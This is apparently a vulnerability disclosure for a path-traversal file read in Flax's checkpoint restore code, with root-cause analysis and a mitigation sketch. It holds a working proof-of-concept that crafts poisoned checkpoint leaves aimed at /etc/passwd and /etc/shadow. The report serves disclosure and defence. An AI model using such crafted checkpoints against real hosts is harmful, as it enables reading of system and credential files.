Reporting here as confirmed with Google Bug Hunters, who replied:
“
We've reviewed it, and while we appreciate you flagging this, we need to let you know that we're no longer offering rewards for product vulnerabilities like this one in projects that fall into the OT2 or OT3 tiers. The Flax repository, https://github.com/google/flax, is currently categorized in this way for reward eligibility. You're still welcome to open an issue or submit a pull request directly on the GitHub repo if you'd like to help get this fixed!
”
Summary
restore_checkpoint treats any checkpoint leaf string beginning with the placeholder //GDAPlaceholder: as a multiprocess-array reference and joins the (attacker-controlled) suffix to the checkpoint directory with no confinement check. A crafted checkpoint can make flax open and read files outside the checkpoint directory (via tensorstore), through the documented multi-host restore path.
Details
flax/training/checkpoints.py, _restore_mpas (L333-334):
```python
mpa_path = os.path.join(ckpt_path + MP_ARRAY_POSTFIX, value[len(MP_ARRAY_PH):])
```
value is a leaf taken from the msgpack checkpoint; the bytes after the MP_ARRAY_PH = '//GDAPlaceholder:' prefix (L71) are attacker-controlled. The joined path feeds get_tensorstore_spec(path) (L288) → gda_manager.deserialize(...) (L289), which opens and reads it. An absolute suffix (/etc/passwd) makes os.path.join discard the base entirely; a ../ suffix climbs out of the …_gda directory. The root cause is a save/restore asymmetry: on save, the suffix is a benign relative pytree key (L183); on restore, it is trusted without validation.
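The join behaviour can be checked without JAX or flax. The sketch below is a hypothetical stdlib-only model of the L333-334 join, not flax code: it assumes MP_ARRAY_POSTFIX is "_gda" (consistent with the …_gda directory above) and uses posixpath, which is what os.path is on POSIX hosts. The checkpoint path /ckpts/checkpoint_0 and the benign key "params" are made-up examples, and the escape check assumes an absolute checkpoint path.

```python
import posixpath

# Assumed values, mirroring flax/training/checkpoints.py as described in this report.
MP_ARRAY_POSTFIX = "_gda"
MP_ARRAY_PH = "//GDAPlaceholder:"


def model_mpa_path(ckpt_path: str, value: str) -> str:
    """Hypothetical model of the _restore_mpas join: the suffix is not validated."""
    return posixpath.join(ckpt_path + MP_ARRAY_POSTFIX, value[len(MP_ARRAY_PH):])


def escapes(ckpt_path: str, path: str) -> bool:
    """True if the lexically normalised path is outside <ckpt_path>_gda (absolute paths only)."""
    base = posixpath.normpath(ckpt_path + MP_ARRAY_POSTFIX)
    # commonpath compares whole components, so a sibling like "..._gda2" also counts as escaped.
    return posixpath.commonpath([base, posixpath.normpath(path)]) != base


ckpt = "/ckpts/checkpoint_0"  # hypothetical checkpoint file path
for suffix in ["params", "/etc/passwd", "../../etc/shadow"]:
    path = model_mpa_path(ckpt, MP_ARRAY_PH + suffix)
    print(f"{suffix!r:22} -> {path} (normalised {posixpath.normpath(path)}, escapes={escapes(ckpt, path)})")
```

With these inputs only "params" stays inside /ckpts/checkpoint_0_gda; "/etc/passwd" replaces the base outright, and "../../etc/shadow" normalises to /etc/shadow.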
Reachability: the documented multi-host restore path. The caller passes a gda_manager and a target containing a multiprocess (non-fully-addressable) jax.Array at the poisoned key; these are the conditions that get the placeholder leaf past _check_mpa_errors and the target type check and into the join. This is the normal state of arrays under jax.distributed/multi-host pjit.
PoC
poc_mpa_traversal.py crafts a msgpack checkpoint whose leaf is MP_ARRAY_PH + "/etc/passwd" (and a second one with a ../ traversal suffix) and restores each with a recording array manager that captures the path flax hands to tensorstore. Output:
```
payload='/etc/passwd' -> READ PATH: /etc/passwd escaped_dir=True
payload='../../../../../etc/shadow' -> READ PATH: /etc/shadow escaped_dir=True
```
poc_mpa_traversal.py:
```python
#!/usr/bin/env python3
"""
PoC: arbitrary file read / path traversal in flax.training.checkpoints.restore_checkpoint
(flax 0.12.7). Sink: flax/training/checkpoints.py:333-334 (_restore_mpas). An attacker leaf
"//GDAPlaceholder:<suffix>" is os.path.join'd onto the ckpt dir with no confinement; an
absolute/`..` suffix escapes, and flax reads it via tensorstore.
Precondition (documented multi-host restore): target has a non-fully-addressable jax.Array at
the poisoned key. MPALeaf is a faithful stand-in (isinstance jax.Array True, is_fully_addressable
False), exactly an array's state under jax.distributed/multi-host pjit. No flax code modified.
Requires: pip install flax jax jaxlib
"""
import os
import tempfile

import jax
import jax.numpy as jnp
from flax import serialization
from flax.training import checkpoints
from flax.training.checkpoints import MP_ARRAY_PH, _is_multiprocess_array


class MPALeaf:
    """Wraps a local array but reports itself as a non-fully-addressable jax.Array."""
    is_fully_addressable = False

    def __init__(self, a):
        object.__setattr__(self, "_a", a)

    def __getattr__(self, k):
        # Delegate everything else (e.g. .sharding) to the wrapped array.
        return getattr(object.__getattribute__(self, "_a"), k)

    @property
    def __class__(self):
        return type(jnp.arange(1))  # pass isinstance(.., jax.Array)


victim = MPALeaf(jnp.arange(4))
assert isinstance(victim, jax.Array) and _is_multiprocess_array(victim)
target = {"params": victim}
captured = {}


class RecordingGdaManager:
    """Stand-in array manager: records the tensorstore specs flax asks it to read."""

    def wait_until_finished(self):
        pass

    def deserialize(self, shardings, ts_specs, *a, **k):
        captured["ts_specs"] = list(ts_specs)
        return [jnp.zeros(4) for _ in ts_specs]


def run(payload):
    with tempfile.TemporaryDirectory() as d:
        ckpt = os.path.join(d, "checkpoint_0")
        # Legacy msgpack checkpoint whose only leaf is the poisoned placeholder string.
        with open(ckpt, "wb") as f:
            f.write(serialization.msgpack_serialize({"params": MP_ARRAY_PH + payload}))
        checkpoints.restore_checkpoint(ckpt, target=target, gda_manager=RecordingGdaManager())
        path = captured["ts_specs"][0]["kvstore"]["path"]
        escaped = not os.path.abspath(path).startswith(os.path.abspath(d))
        print(f"payload={payload!r:30} -> READ PATH: {path} escaped_dir={escaped}")
        return escaped


ok = run("/etc/passwd") and run("../../../../../../etc/shadow")
print("CONFIRMED: checkpoint leaf -> arbitrary out-of-dir read path" if ok else "not reproduced")
raise SystemExit(0 if ok else 1)
```
Impact
Loading an untrusted Flax checkpoint (a common ML supply-chain scenario) on the multi-host restore path makes flax read arbitrary host files during the restore (confidentiality impact). There is no code execution.
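A possible mitigation is to validate the suffix before the join. The sketch below is a hypothetical helper (confined_mpa_path is not a flax function) that assumes "/"-separated relative suffixes, as produced on save from pytree keys, and the same assumed "_gda" postfix. It rejects absolute suffixes and any empty, "." or ".." component instead of normalising the path, so gs:// checkpoint paths are left untouched. The check is lexical only and does not resolve symlinks.

```python
import posixpath

# Assumed constants, as described in this report.
MP_ARRAY_POSTFIX = "_gda"
MP_ARRAY_PH = "//GDAPlaceholder:"


def confined_mpa_path(ckpt_path: str, value: str) -> str:
    """Hypothetical hardened join: accept only relative suffixes that stay inside <ckpt>_gda."""
    if not value.startswith(MP_ARRAY_PH):
        raise ValueError(f"not a multiprocess-array placeholder: {value!r}")
    suffix = value[len(MP_ARRAY_PH):]
    parts = suffix.split("/")
    # An absolute suffix would make join() discard the base; empty, "." and ".."
    # components could point at or above the base directory.
    if suffix.startswith("/") or any(p in ("", ".", "..") for p in parts):
        raise ValueError(f"refusing unsafe array path suffix: {suffix!r}")
    return posixpath.join(ckpt_path + MP_ARRAY_POSTFIX, suffix)


for suffix in ["params", "/etc/passwd", "../../etc/shadow"]:
    try:
        print(confined_mpa_path("/ckpts/checkpoint_0", MP_ARRAY_PH + suffix))
    except ValueError as e:
        print("rejected:", e)
```

Rejecting unsafe components outright, rather than normalising and comparing prefixes, avoids collapsing the "//" in gs:// URLs and keeps the legitimate case (a plain relative pytree key) unchanged.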